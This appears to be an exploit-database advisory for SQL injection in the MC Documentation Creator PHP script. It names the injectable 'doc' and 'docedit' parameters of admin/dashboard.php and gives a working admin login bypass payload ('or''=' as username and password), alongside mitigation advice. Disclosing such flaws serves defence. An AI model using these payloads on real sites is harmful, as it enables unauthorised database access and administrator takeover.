SQL Injection Web Vulnerability

vendor:

MC Documentation Creator

by:

İhsan Şencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: MC Documentation Creator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

SQL Injection Web Vulnerability

The vulnerability exists due to improper validation of user-supplied input in the 'doc' and 'docedit' parameters of the 'dashboard.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. An attacker can also bypass the authentication process by setting the username and password to 'or''='.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks. It is also recommended to use prepared statements when interacting with the database.

Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: SQL Injection Web Vulnerability
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Documentation Creator
# Script Buy Now: http://microcode.ws/product/mc-documentation-creator-php-script/3890
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/admin/dashboard.php?doc=[SQL]
# http://localhost/[PATH]/admin/dashboard.php?docedit=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter.
# # # # #